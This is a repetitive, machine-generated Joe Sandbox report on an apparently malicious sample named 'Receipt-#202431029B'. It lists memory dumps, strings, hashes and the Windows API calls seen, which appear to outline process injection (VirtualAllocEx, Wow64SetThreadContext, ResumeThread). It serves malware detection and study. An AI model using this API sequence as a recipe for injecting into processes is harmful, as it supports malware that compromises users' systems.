                                                                  • Source File: 00000000.00000002.1678444630.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5720000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: DrawText
                                                                  • String ID:
                                                                  • API String ID: 2175133113-0
                                                                  • Opcode ID: 001218503bd74755410e53448c981db5acf9a4f37076b72cb0d2755f072e706c
                                                                  • Instruction ID: b420d402b6634974ea63b743a96fe07172eebb756880984cff2eae09e6ccd70f
                                                                  • Instruction Fuzzy Hash: 1021CEB5D003499FDB10CF9AD885AAEFBF5FF48320F14842AE919A7210D775A944CFA1
                                                                  APIs
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07575C60
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  • Opcode ID: 554399a9e60da28d1df75732f2a60c37f287a1ed37c853a858e90b219436c18e
                                                                  • Instruction ID: f2e958ac4a139fec07d2dccc06c3a3fc285df95e585b79c2a7d343235625570c
                                                                  • Instruction Fuzzy Hash: 9C214AB18007499FCB10DFAAD845BEEFBF5FF48320F50842AE559A7240C7359944DBA5
                                                                  APIs
                                                                  • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0572F05F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1678444630.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5720000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: DrawText
                                                                  • String ID:
                                                                  • API String ID: 2175133113-0
                                                                  • Opcode ID: 53dde8006f6badcd7f9e777486ebae962e9e533acb4504f6344149cc56bd0ded
                                                                  • Instruction ID: f79af0d8cb195ce32f7bb8d3bc4aaee0c724c5fb8000c324432892e83bd86623
                                                                  • Instruction Fuzzy Hash: 5C21EEB5D003099FDB10CF99D985AAEFBF5FF48320F24842AE919A7210D774A944CFA0
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A2D84F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 930dfba84b6dc9f020278b24b8b65c42d9410546dea55756c07c21d3fbff2da7
                                                                  • Instruction ID: 46715b1906e7a6a1dda49489acf727fe56aca225ee647feeaeba5410ddccac68
                                                                  • Instruction Fuzzy Hash: 472105B59002499FDB10CF99D484ADEBFF4FF48320F14806AE958A3211C3789951CFA0
                                                                  APIs
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07575C60
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0757559E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A2D84F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07575A9E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07575A9E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  APIs
                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07579A2D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost
                                                                  • String ID:
                                                                  • API String ID: 410705778-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  APIs
                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07579A2D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost
                                                                  • String ID:
                                                                  • API String ID: 410705778-0
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00A2B566
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (hq
                                                                  • API String ID: 0-4060669308
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %*&/)(#$^@!~-_
                                                                  • API String ID: 0-3325533558
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %*&/)(#$^@!~-_
                                                                  • API String ID: 0-3325533558
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Tedq
                                                                  • API String ID: 0-228892971
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq
                                                                  • API String ID: 0-847773763
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: W
                                                                  • API String ID: 0-655174618
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq
                                                                  • API String ID: 0-847773763
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: G
                                                                  • API String ID: 0-985283518
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: G
                                                                  • API String ID: 0-985283518
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1340060e24b4a85a9b19d3d03cc8e0a5178cb5b01ca4c23a1ace42ee834e760f
                                                                  • Instruction ID: 88c71f8a8d95ec22f38254f4335118f0b03ab82183cc5c8383765dd6b737817c
                                                                  • Opcode Fuzzy Hash: 1340060e24b4a85a9b19d3d03cc8e0a5178cb5b01ca4c23a1ace42ee834e760f
                                                                  • Instruction Fuzzy Hash: F6F1C571D1061ACBCF14DFA8C854AEDB7B5BF88300F1086AAD559B7254EB70AA85CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c47abe0da6a0bdfa2e6434c69cdcc0192d7176f888c850c2deb652690c55a1dd
                                                                  • Instruction ID: 02c9440e781f737547a2849ed4f799065a14097c32475cceb3b4ed77729761f3
                                                                  • Opcode Fuzzy Hash: c47abe0da6a0bdfa2e6434c69cdcc0192d7176f888c850c2deb652690c55a1dd
                                                                  • Instruction Fuzzy Hash: E7E1D771D1061ACBCF10DFA8C8546EDB7B5FF88300F1186AAD559B7254EB70AA85CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d4c58477df635d886e12b85a8f3f02caaf5a28ac5807a507e5d18f5635ac73a4
                                                                  • Instruction ID: b5bdea4d7492eba15e6074b3777b6fb66f69875f6a1a51ce42a02e853dbf212d
                                                                  • Opcode Fuzzy Hash: d4c58477df635d886e12b85a8f3f02caaf5a28ac5807a507e5d18f5635ac73a4
                                                                  • Instruction Fuzzy Hash: 66B1F975910619CFCB10EF68C840AD8FBB5FF49314F05C299E549BB215EB70AA89CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 046c37a1d9f52eab1fe05286809a75aeadd41a2073e5240b803d34117a6d416a
                                                                  • Instruction ID: a513d316657f8e87c623618e837749b27158c658d244e3c5accb773d376eb5cc
                                                                  • Opcode Fuzzy Hash: 046c37a1d9f52eab1fe05286809a75aeadd41a2073e5240b803d34117a6d416a
                                                                  • Instruction Fuzzy Hash: 52512D74A1060A8FCF10DFA8C8849ADF7B5FF89310F509669D456B7314EB70E985CB50
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 61d43d134d3b7bccc52216bdc0cebe58b33a7a5afb3bea92a648ec95a82fdf42
                                                                  • Instruction ID: 297d1043ab7f7368a1b94051f09942e2cc22a42b219c1495428bcfc424c21275
                                                                  • Opcode Fuzzy Hash: 61d43d134d3b7bccc52216bdc0cebe58b33a7a5afb3bea92a648ec95a82fdf42
                                                                  • Instruction Fuzzy Hash: C74160B0A2120ADFEB15DF68E454A6EB7FAFF89301F144079D80697290DE30D951CB51
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b3e6e7bd8729a0fccb977466d9f30ccf41bb074a67cde1131bb9a359b86db298
                                                                  • Instruction ID: b03c033ecf4603f54c3ceccc25c113214f41fbc0325b69eadde6feea2c2f4b0a
                                                                  • Opcode Fuzzy Hash: b3e6e7bd8729a0fccb977466d9f30ccf41bb074a67cde1131bb9a359b86db298
                                                                  • Instruction Fuzzy Hash: B9519335E10619CFCB00EFA8D4849EDF7B5FF89300F50856AE506AB321EB71A959CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6ce6c55e06bb88fb447c7eb760054fe7e7e172af9841528e8787dbe14436c41a
                                                                  • Instruction ID: bbba8f63b174b617f10466b9f3f84669181564d3d64412751032ae5d18389b83
                                                                  • Opcode Fuzzy Hash: 6ce6c55e06bb88fb447c7eb760054fe7e7e172af9841528e8787dbe14436c41a
                                                                  • Instruction Fuzzy Hash: 5B416E70A1060A8FCF10DFA4C8845ADFBB5FF89310B548669D456A7315EB74E985CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b42d978c5951db274bf4a9f99977f0c9b9658c2c27de92c3918921e2d66d24d0
                                                                  • Instruction ID: 16c64ba4d2f0b22408e09484d4fc6e689657252bea520396bffc09259503f7b1
                                                                  • Opcode Fuzzy Hash: b42d978c5951db274bf4a9f99977f0c9b9658c2c27de92c3918921e2d66d24d0
                                                                  • Instruction Fuzzy Hash: 5141D6B0B3420ACFDB118FA8C891BBEB7B9EF45300F90C427E1569B240C7B59985CB52
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dd872e1ba27bf6c3dd396914a9d8b3070ae25d119816e2386ddeabcdc3735f86
                                                                  • Instruction ID: 45d96097dc8f8a8ac07331188ded2ade81c37a03f81d0fafb63e6824fc7c6f37
                                                                  • Opcode Fuzzy Hash: dd872e1ba27bf6c3dd396914a9d8b3070ae25d119816e2386ddeabcdc3735f86
                                                                  • Instruction Fuzzy Hash: A941D9B063D3958FC7056B74982816E7FBAAB86311F6444ABD583CB382CE744D42C772
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eb570b4e02e3b7a37443d41d809ecbdab5be816c56e5fa9752c05f57680e246f
                                                                  • Instruction ID: 05fbe994fdab0f8ba8f922b64198e34b8c0c2fa0ddd091d88f1b8a008b585ca7
                                                                  • Opcode Fuzzy Hash: eb570b4e02e3b7a37443d41d809ecbdab5be816c56e5fa9752c05f57680e246f
                                                                  • Instruction Fuzzy Hash: E731DFF0A3C256CBCB108AEC885027EB7BDBB47210F948177E416CE285C6B1D9D187B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 57044eaaaca9bb24139fd1c1422d83f7e4aeda6be5b1a103b4eaf737ceff72e3
                                                                  • Instruction ID: 90e634a4f4669c7cbe436bcc4c65847dcf7ba575476ccffcc31f93f36fa7d9c1
                                                                  • Opcode Fuzzy Hash: 57044eaaaca9bb24139fd1c1422d83f7e4aeda6be5b1a103b4eaf737ceff72e3
                                                                  • Instruction Fuzzy Hash: 7D3191B1A20229DFDB14DFA8D84499DBBF6FF89301F10816AE905AB360DF709C51CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 51cb81a24c816fed22d55a7e536ac48afb5907c23ad69a11756cf81667c50b57
                                                                  • Instruction ID: 0ab68d86aedcd058424d7750c486d0b48f4f31e9cecd602dfe5c71397b0c0442
                                                                  • Opcode Fuzzy Hash: 51cb81a24c816fed22d55a7e536ac48afb5907c23ad69a11756cf81667c50b57
                                                                  • Instruction Fuzzy Hash: CF3104B0634108CFD700DF98D4557AA77FAEBAA314F94D45AC016AB391CB75ED828BA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e0426ba8b69e4750e584aab463fd4a6877241e6026490c771bddcbf277f22b71
                                                                  • Instruction ID: a6db58484bbc987bc91e9ff5d9503ff4d165fae384b2eeb3ac2e9a18243ea9b1
                                                                  • Opcode Fuzzy Hash: e0426ba8b69e4750e584aab463fd4a6877241e6026490c771bddcbf277f22b71
                                                                  • Instruction Fuzzy Hash: 5B3178B1A102499FCF14DFA9D844ADEBFF9EF48310F50802AE809A7310D734A944CFA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 73d2002787d97a74d8d4b2dea97baffd45a6e53e90d6a9fb239a4025576abba7
                                                                  • Instruction ID: 234926306334c7641b2efcac115f3175e8be0dc8abd61e55e52f4b65e634d591
                                                                  • Opcode Fuzzy Hash: 73d2002787d97a74d8d4b2dea97baffd45a6e53e90d6a9fb239a4025576abba7
                                                                  • Instruction Fuzzy Hash: BB31B1B0A21615EFCB14DF64C844BAEBBFAFF88300F548529E516A7290DB75ED40CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 337d994d9aa0b5c275c62d3150e0ea34d262fab0ed5f26ce83935aaf3e5cafdc
                                                                  • Instruction ID: 8985a46667df5e372bc2487c88e9a86de91a22f3c1be003823787466d44c9167
                                                                  • Opcode Fuzzy Hash: 337d994d9aa0b5c275c62d3150e0ea34d262fab0ed5f26ce83935aaf3e5cafdc
                                                                  • Instruction Fuzzy Hash: 1431C2B4A2130ADFEB25DF64D518BAA7BBAAF89300F144079D406D7291CB74CD51CB52
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f171dbd84d074070ee5ebe35fc554c6be11d9ba5f6a3aef1b8dddb7dfbe129a2
                                                                  • Instruction ID: 586687b9384312d0db28de571052ae722ce71490e137ef5dbb1828cb5a03bd91
                                                                  • Opcode Fuzzy Hash: f171dbd84d074070ee5ebe35fc554c6be11d9ba5f6a3aef1b8dddb7dfbe129a2
                                                                  • Instruction Fuzzy Hash: 8D21D8F0734205DBC7249AD994116BA77AFBBC6750FA58026E8174B695CAB08CC28377
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2b519bb0b297b4f41a6575f1eb7bbc68f4b89c47cb721be74d0d02011863fad1
                                                                  • Instruction ID: 3caefee5b371f37b0db05426201b74929f3e7d7ab9a2220549c74b983294a6d2
                                                                  • Opcode Fuzzy Hash: 2b519bb0b297b4f41a6575f1eb7bbc68f4b89c47cb721be74d0d02011863fad1
                                                                  • Instruction Fuzzy Hash: 8031ADB5710202CFDB14DF69D880B6A73EEFB89311F548869E90ACB355DB30AC458B60
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 66631f7f7a87df78476f11b14bf1c8c61d880bdf93ccc16422c86c7b8e0f4ca5
                                                                  • Instruction ID: 62a4506d7cf335680fbc8a77b6ff09da75c468d9c0ae1cb364bbe0a7dffa8376
                                                                  • Opcode Fuzzy Hash: 66631f7f7a87df78476f11b14bf1c8c61d880bdf93ccc16422c86c7b8e0f4ca5
                                                                  • Instruction Fuzzy Hash: 473118B4E2020E9FCF50DFE8D4505EEBBF5EB58310F504429D515E7250EB349A448BA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3d6e5a076b362d800e4f73e67a0f1cbf50e6686058fc3804217de19ba5c9c7df
                                                                  • Instruction ID: be80ff1fd1c2e65643e2ce54568f9e8daed1d5d0f2cf2e05927110ea4289de7d
                                                                  • Opcode Fuzzy Hash: 3d6e5a076b362d800e4f73e67a0f1cbf50e6686058fc3804217de19ba5c9c7df
                                                                  • Instruction Fuzzy Hash: 06318431A10619DFCB00EFA8C4948EDFBB5FF89310F018299E5056B224FB70AD89CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2f91f93081312f26f34fd75952f7793570a15fc9da48ab51139f1193c71caee3
                                                                  • Instruction ID: 29bfd8ec7c5c706050d1e207f209ea8c3e08696766b41b68e8336abaf80ed353
                                                                  • Opcode Fuzzy Hash: 2f91f93081312f26f34fd75952f7793570a15fc9da48ab51139f1193c71caee3
